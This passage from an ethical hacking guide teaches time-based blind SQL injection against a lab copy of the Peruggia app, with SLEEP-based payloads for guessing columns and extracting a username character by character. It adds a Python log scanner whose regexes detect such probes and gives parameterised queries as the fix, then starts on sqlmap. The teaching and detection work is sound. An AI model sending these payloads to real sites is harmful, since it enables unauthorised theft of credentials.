Ethical Hacking and Penetration Testing Guide
Guessing the Columns
Now since we have figured out that a “user” table exists in the database, we will try guessing the columns.
Syntax
http://192.168.75.147/peruggia/index.php?action=comment&pic_id=13&pic_id=13 and IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_table_name] limit 0,1),1,1)=1,SLEEP(5),1)--
Web Hacking ◾ 365
From this screenshot, we can conclude that the password column exists in the database.
Extracting Data from Columns
Finally, we will try to enumerate the data present in the columns, again one character at a time. Along with the password column, there also exists a username column, so we will try to enumerate the username; you can do the same with the password. The syntax is as follows:
Syntax
http://192.168.75.147/peruggia/index.php?action=comment&pic_id=13&pic_id=13 and if((select mid(column_name,1,1) from table_name limit 0,1)='a',sleep(5),1)--
From this screenshot, you can see that our first query succeeded and the first character of the username is “a”; the second query failed since the second character is not “a”. In this way, we can extract the entire username, “admin”. I will leave extracting the password to you.
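The two payload shapes above (a conditional wrapped around a one-character comparison, with SLEEP(5) as the signal and a trailing comment) leave a distinctive trail in web server logs, and every true branch also shows up as a response that took about five seconds. The following defender-side log scanner is an added example, not code from the book: it parses access-log lines, URL-decodes each query parameter, flags time-delay functions and character-at-a-time conditionals, and correlates them with the recorded request duration so the analyst can see which probes actually returned a bit to the attacker. The log lines, client addresses and timestamps are constructed for the example; only the /peruggia/index.php path and the pic_id parameter come from the page, and the duration field is assumed to be appended to the standard combined format (as nginx's $request_time would).

```python
"""Detect time-based blind SQL injection probes in web access logs (added example)."""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: combined log format with a trailing request duration in
# seconds (assumed to be nginx $request_time or an equivalent). The path and
# pic_id parameter follow the page; IPs, timestamps and byte counts are made up.
LOG_LINES = [
    '192.168.75.1 - - [01/Jan/2024:10:00:01 +0000] "GET /peruggia/index.php?action=comment&pic_id=13 HTTP/1.1" 200 2311 0.012',
    '192.168.75.1 - - [01/Jan/2024:10:00:07 +0000] "GET /peruggia/index.php?action=comment&pic_id=13%20and%20IF(SUBSTRING((select%20substring(concat(1,password),1,1)%20from%20user%20limit%200,1),1,1)=1,SLEEP(5),1)-- HTTP/1.1" 200 2311 5.018',
    '192.168.75.1 - - [01/Jan/2024:10:00:13 +0000] "GET /peruggia/index.php?action=comment&pic_id=13%20and%20if((select%20mid(username,1,1)%20from%20user%20limit%200,1)=%27a%27,sleep(5),1)-- HTTP/1.1" 200 2311 5.021',
    '192.168.75.1 - - [01/Jan/2024:10:00:14 +0000] "GET /peruggia/index.php?action=comment&pic_id=13%20and%20if((select%20mid(username,2,1)%20from%20user%20limit%200,1)=%27a%27,sleep(5),1)-- HTTP/1.1" 200 2311 0.011',
    '10.0.0.5 - - [01/Jan/2024:10:01:00 +0000] "GET /peruggia/index.php?action=login HTTP/1.1" 200 1500 0.009',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) (?P<secs>\d+(?:\.\d+)?)$'
)

# Delay primitives of the common engines, matched on the URL-decoded value.
DELAY_RE = re.compile(r'\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b', re.I)
# Conditional and substring wrappers used by character-at-a-time probes.
COND_RE = re.compile(r'\b(?:if|case|substring|substr|mid)\s*\(', re.I)
# Trailing SQL comment that discards the rest of the original statement.
COMMENT_RE = re.compile(r'(?:--|#)\s*$|/\*')
# The page's payloads use SLEEP(5); anything near that counts as a confirmed delay.
SLOW_SECONDS = 4.0


def parse_line(line):
    """Split one access-log line into fields; returns None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["secs"] = float(rec["secs"])
    return rec


def classify_request(rec):
    """Return a finding for one parsed request, or None if it looks benign."""
    params = parse_qsl(urlsplit(rec["target"]).query, keep_blank_values=True)
    reasons, has_delay = [], False
    for name, value in params:  # values are already percent-decoded here
        if DELAY_RE.search(value):
            has_delay = True
            reasons.append(f"time-delay function in '{name}'")
        if COND_RE.search(value) and COMMENT_RE.search(value):
            reasons.append(f"conditional probe with trailing SQL comment in '{name}'")
    if not reasons:
        return None
    names = [n for n, _ in params]
    dupes = sorted({n for n in names if names.count(n) > 1})
    if dupes:  # repeated parameters are a secondary anomaly, not proof on their own
        reasons.append("repeated parameter(s): " + ", ".join(dupes))
    return {
        "ip": rec["ip"],
        "timestamp": rec["ts"],
        "reasons": reasons,
        "response_secs": rec["secs"],
        # A slow response to a payload carrying a delay function means the
        # injected condition evaluated true: the attacker learned one character.
        "delay_confirmed": has_delay and rec["secs"] >= SLOW_SECONDS,
    }


def scan_log(lines):
    """Run the classifier over every line and return the findings in log order."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        finding = classify_request(rec)
        if finding:
            findings.append(finding)
    return findings


def probes_per_ip(findings):
    """Count probes and confirmed delays per client; a long run from one address
    is the signature of character-at-a-time extraction."""
    counts = {}
    for f in findings:
        c = counts.setdefault(f["ip"], {"probes": 0, "confirmed": 0})
        c["probes"] += 1
        c["confirmed"] += int(f["delay_confirmed"])
    return counts


if __name__ == "__main__":
    results = scan_log(LOG_LINES)
    for f in results:
        print(f["ip"], f["timestamp"], f["response_secs"], f["delay_confirmed"], "; ".join(f["reasons"]))
    print(probes_per_ip(results))
```

Run as a script, it reports three probes from 192.168.75.1, two of them with a five-second response (the true branches) and one that returned immediately (the false branch), while the plain pic_id=13 request and the unrelated login request are left alone. The scanner only tells you that probing happened; the fix that makes these requests harmless is to pass pic_id to the database as a bound parameter rather than by string concatenation.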
Automating SQL Injections with Sqlmap
We talked about many types of SQL injection vulnerabilities and how to exploit them. You might have realized by now that exploiting SQL injection by hand can be a very tedious task; therefore, a better option is to use automated tools such as sqlmap.
Sqlmap is one of the best tools for exploiting SQL injection vulnerabilities. It supports many databases and helps us not only to enumerate and extract databases but also to execute system commands. I will discuss the basics of sqlmap and leave the rest for you to explore, since it includes a huge list of functions that cannot all be explained here.
We will use the same vulnerable application that was used for demonstrating UNION-based and Boolean-based SQL injection.
Sqlmap can be found in the /pentest/database/sqlmap directory in BackTrack 5 R3. This might differ based on what version of BackTrack you are using; you can use the locate command to search for sqlmap. Once in the directory, execute the following command to launch the sqlmap help menu.